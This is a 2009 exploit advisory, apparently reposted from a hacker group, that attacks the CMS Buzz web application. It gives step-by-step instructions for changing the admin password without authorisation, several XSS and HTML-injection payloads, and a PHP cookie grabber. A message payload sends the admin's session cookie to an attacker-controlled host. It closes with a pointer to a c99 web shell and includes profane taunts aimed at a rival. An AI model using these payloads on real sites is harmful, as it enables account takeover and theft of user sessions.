Security Advisory: CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities
  fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
  FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit

From: ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com>
Date: 22.06.2009
Subject: CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

#################################################################################
################################
[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
[+] Discovered By xhaxkerx
[+] Vendor: http://www.c99.mobi
[+] Note : If you are The S3r!0uS I say To Fuck you Because You are Hacked Site Of My Best Friends
dz-boys.com
[+] Demo:http://demo.cmsbuzz.com/
[+] Greeting : yasin
#################################################################################
################################
Remote Changing Password:
+++++++++++++++++++++++++
1) You Must Register In ThE site http://www.victim.com/?action=register
2) Login
3) Go To url:
   http:///www.victim.com/?action=profile&user= [ Name Of user ]
Example
http:///www.victim.com/?action=profile&user=admin
Change admin Password Then go To login http://path/?action=login
Cross Site Scritping
++++++++++++++++++++
http://www.victim.com/?action=search
<script>alert("xss")</script>

#################################################################################
################################
[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
[+] Discovered By ThE g0bL!N
[+] Vendor:http://msbuzz.com/
[+] Fuck You The S3r!0uS
#################################################################################
################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php - > Put in this File That Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php

[+]Exploit:
  -------
1) Register in The SIte
2) Go to send message http://path/?action=compose
3)We Put in
To:admin name
Subject: Some Subject
Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" +
document.cookie;</script>
The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
1) Register :p
2) Go to send message http://path/?action=compose
3)We Put in
To:admin name
Subject: Some Subject
Message: 1)XSS:PoC :<script>alert("xss")</script>
            ---------
          2)Poc: Iframe :"><iframe src=http://www.google.com/></iframe>
      -------------
    3)PoC : Redirection:">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/">
""
    -------------------
    DEMO:http://demo.cmsbuzz.com

# if you need shell http://www.c99.mobi/c99.txt

#################################################################################
###############################

test server